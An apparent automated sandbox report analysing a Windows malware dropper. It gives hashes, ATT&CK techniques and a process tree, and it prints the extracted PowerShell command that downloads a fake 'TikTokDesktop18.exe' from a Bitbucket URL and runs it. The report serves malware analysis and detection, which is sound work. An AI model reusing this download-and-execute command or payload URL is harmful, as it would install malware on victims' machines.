017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28/11/2024, 21:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
Size

89KB
MD5

834924ac31fd6b5978bad287da3f99f9
SHA1

3289c8848c485ededbc7600171d74e9570553376
SHA256

017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1
SHA512

feaaf94fd41de5e86fc90f4cc49a57326deb2f1edce1b96384e36924b81727ecabab9a88723348f8962f370564fd1565c1bea6f2230e6c28f710a55a50eb6639
SSDEEP

1536:z7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAw3OL:v7DhdC6kzWypvaQ0FxyNTBfAd

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2720	powershell.exe
6	2720	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2720	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	bitbucket.org
5	bitbucket.org
6	bitbucket.org

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2720	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2720	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2092 wrote to memory of 2712	2092	017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe	31
PID 2092 wrote to memory of 2712	2092	017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe	31
PID 2092 wrote to memory of 2712	2092	017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe	31
PID 2092 wrote to memory of 2712	2092	017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe	31
PID 2712 wrote to memory of 2720	2712	cmd.exe	32
PID 2712 wrote to memory of 2720	2712	cmd.exe	32
PID 2712 wrote to memory of 2720	2712	cmd.exe	32
PID 2712 wrote to memory of 1440	2712	cmd.exe	33
PID 2712 wrote to memory of 1440	2712	cmd.exe	33
PID 2712 wrote to memory of 1440	2712	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2092
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2720
- - C:\Windows\system32\cmd.exe
    cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
    3⤵
    PID:1440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat

Filesize
260B

MD5
1904675eec0f302424c4bde0956dab54

SHA1
267c3174e35e0e2a7d104f98b3326f313f2e464e

SHA256
45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6

SHA512
fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3

Download Submit
memory/2720-6-0x000007FEF646E000-0x000007FEF646F000-memory.dmp

Filesize
4KB

Download
memory/2720-7-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2720-9-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2720-8-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

Filesize
32KB

Download
memory/2720-10-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2720-11-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2720-12-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

Filesize
9.6MB

Download